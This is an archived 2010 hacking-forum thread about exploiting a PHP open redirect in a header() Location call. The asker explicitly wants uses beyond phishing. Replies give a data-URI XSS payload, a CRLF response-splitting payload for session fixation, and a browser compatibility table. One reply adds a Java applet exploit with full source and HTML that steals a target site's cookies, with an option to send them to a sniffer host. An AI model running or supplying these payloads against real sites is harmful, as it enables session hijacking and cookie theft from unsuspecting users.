Cenzic 232 Patent
Paid Advertising
sla.ckers.org is
ha.ckers sla.cking
Sla.ckers.org
Q and A for any cross site scripting information. Feel free to ask away. 
Go to Topic: PreviousNext
Go to: Forum ListMessage ListNew TopicSearchLog In
PHP header location (open redirect)
Posted by: PaPPy
Date: August 18, 2010 08:40PM

this isnt really xss, or code injection, so i wasnt sure where to put it.

my question is i have an open redirect

header("Location: $_GET[");____other than using it for phishing, what can i use it for?__are there ways to set other header info? xss? (there is no xss on the site, i would know i use to code for them)__http]

Options: ReplyQuote
Re: PHP header location (open redirect)
Posted by: p0deje
Date: August 19, 2010 02:24AM

you can use data URI scheme attack vector
e.g. ?url=data:text/html;base64,PHNjcmlwdD5hbGVydCgiWFNTIik8L3NjcmlwdD4=

works in FF3.6

---------
http://p0deje.blogspot.com

Options: ReplyQuote
Re: PHP header location (open redirect)
Posted by: PaPPy
Date: August 19, 2010 07:03AM

just 3.6? or the whole suite?
tried with 3.6.8 and it just redirected me to a black page of
data:text/html;base64,PHNjcmlwdD5hbGVydCgiWFNTIik8L3NjcmlwdD4=

http://www.xssed.com/archive/author=PaPPy/

Options: ReplyQuote
Re: PHP header location (open redirect)
Posted by: Reiners
Date: August 19, 2010 07:43AM

you can set cookies for session fixation attacks or you can inject a second response page with javascript (only worked in FF for me back in the days):

%0d%0aSet-Cookie:%20PHPSESSID=fixated%0d%0aContent-Type:%20text/html
%0d%0a%0d%0a%3Cscript%3Ealert(document.cookie)%3C/script%3E

search for "http response splitting".
these attacks only work for header() in PHP 4 < 4.4.2 and PHP 5 < 5.1.2. In later versions this function has been patched against CRLF injection and will throw a "Header may not contain more than a single header, new line detected." error.

Options: ReplyQuote
Re: PHP header location (open redirect)
Posted by: Anonymous User
Date: August 19, 2010 04:30PM

FF 3.6.x | javascript:alert(document.domain) X | data:,<script>alert(document.domain)</script> OK (about:blank)

IE8      | javascript:alert(document.domain) X | data:,<script>alert(document.domain)</script> X

Chrome 7 | javascript:alert(document.domain) X | data:,<script>alert(document.domain)</script> X

Safari 5 | javascript:alert(document.domain) X | data:,<script>alert(document.domain)</script> OK (about:blank)

Opera 10 | javascript:alert(document.domain) X | data:,<script>alert(document.domain)</script> OK (about:blank)

Behavior changes depending on status message - but nothing really significant. FF and Opera execute the JS with 300,301,302,303,307 - Safari 5 prefers 301,302,303,305,306,307. Hope that helped.



Edited 2 time(s). Last edit at 08/19/2010 04:41PM by .mario.

Options: ReplyQuote
Re: PHP header location (open redirect)
Posted by: p0deje
Date: August 20, 2010 02:51AM

for Firefox 3.6.8 it executes from time to time (cannot necessary behavior)
same exploit works always in Opera 10.61
doesn't work for Chrome 6 (requires page reload)

---------
http://p0deje.blogspot.com

Options: ReplyQuote
Re: PHP header location (open redirect)
Posted by: LeverOne
Date: August 20, 2010 01:50PM

Getting the cookies using a server-side redirect and JAVA. (without JavaScript)
FIXED in JAVA 1.6.0_22 21 Oct 2010.

* Time to use my "pocket" vulnerability.
* This method works in all recent browsers. Last time I tested it on JAVA 1.6.0_21, but long ago I also tested it on JAVA 1.6.0.

1. Download applet http://code.google.com/p/cookieexpropriator/downloads/list

2. Usage.

Suppose we have a server-side redirect to the site http: //somesite.com/redirect.php?url=blabla
We want to get a cookie from http: //somesite.com/

Also suppose site, where we can control the markup and upload files, is http: //yoursite.com

http://yoursite.com/test.html

<html>
<body>

<applet code=CExpr.class archive=redirect.php?url=http://yoursite.com/CExpr.jar  codebase=http://somesite.com/ width=1 height=1 mayscript=true>                                                       
<param name=from value=http://somesite.com>                                                                                                   
<param name=method value=get>         
<!--    to send cookies to sniffer                                                                                      
<param name=s value=http://mysniffer.com/s.gif>  
-->
<!-- to display the result on the console -->                                                                                     
<param name=output>                                                                                                               
</applet> 

</body>
</html>

* CExpr.jar - This is CExpr.class in zip-archive (just rename the "zip" to "jar").

* In the java-console can be seen:

cookie: Request[ Host: somesite.com User-Agent: Mozilla/4.0 (Windows XP 5.1) Java/1.6.0_21 Cookie: bla=bla; bla1=bla1 ]; exceptmessage:

Thus, if we have a server-side redirection, we have cookies. Right now.


==============

Simple demo-applet (need javascript to display the result)

*This applet can be used to test the vulnerability in pure form.

CExpr.java
import java.applet.*;
import java.net.*;
import java.io.*;

public class CExpr extends Applet 
{
 public void start() 
 {
  try {
       URL url = new URL('http://somesite.com');  // should return 200 OK preferably
       HttpURLConnection conn = (HttpURLConnection) url.openConnection();
       InputStream inp;
       try {
            conn.getInputStream();    // method GET
           }
       catch (IOException ee)
           {
            conn.getErrorStream();
           }
       String cookie = conn.getRequestProperty("Cookie");
       getAppletContext().showDocument(new URL("javascript:alert('"+cookie+"');"));
      }
  catch (Exception e){}
 }
}

<applet code=CExpr.class archive=redirect.php?url=http://yoursite.com/CExpr.jar codebase=http://somesite.com/ ></applet>

DEMO

http://olo-olo-lo.narod.ru/test.html

LeverOne

----------------------
~Veritas~



Edited 8 time(s). Last edit at 02/14/2011 10:51AM by LeverOne.

Options: ReplyQuote
Re: PHP header location (open redirect)
Posted by: Kyo
Date: August 21, 2010 01:13PM

That's pretty damn clever. Love it.

Options: ReplyQuote


Sorry, only registered users may post in this forum.